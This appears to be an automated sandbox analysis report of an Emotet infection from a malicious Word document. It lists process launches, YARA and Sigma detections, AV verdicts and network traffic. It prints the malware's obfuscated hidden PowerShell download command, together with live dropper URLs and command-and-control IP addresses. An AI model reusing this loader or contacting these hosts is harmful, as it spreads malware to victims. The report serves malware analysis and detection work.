rundll32.exe (PID: 2908 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2472 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2488 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 620 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1916 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1472 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f30:$s1: POwersheLL
00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author
18.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.140000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.2f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.4a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.310000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.2f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
20.2.rundll32.exe.140000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 37 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://johnhaydenwrites.com/track_url/P/	Avira URL Cloud: Label: malware
Source: https://nahlasolimandesigns.com/nahla3/d/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/P	Avira URL Cloud: Label: malware
Source: http://hbprivileged.com/cgi-bin/kcggF/	Avira URL Cloud: Label: malware
Source: http://zenithcampus.com/l/yQ/	Avira URL Cloud: Label: malware
Source: https://football-eg.com/web_map/n/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	Metadefender: Detection: 56%			Perma Link
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Show sources

Source: DAT.doc	Virustotal: Detection: 71%			Perma Link
Source: DAT.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Joe Sandbox ML: detected

Cryptography:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020A69B CryptDecodeObjectEx,

20_2_0020A69B

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Spreading:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: zenithcampus.com

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 167.71.148.58:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 35.200.206.198:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49169 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49172 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://vietnhabienhoa.com/wordpress/QUTy/

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 167.71.148.58 167.71.148.58

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY

Source: global traffic

HTTP traffic detected: POST /um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ HTTP/1.1DNT: 0Referer: 167.71.148.58/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/Content-Type: multipart/form-data; boundary=-----------------------z2vqH5ZpSVZftRl6dB758VDUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 5908Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020280B InternetReadFile,

20_2_0020280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: zenithcampus.com

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Tue, 26 Jan 2021 12:48:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-transform, no-cache, no-store, must-revalidateLink: <https://zenithcampus.com/wp-json/>; rel="https://api.w.org/"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
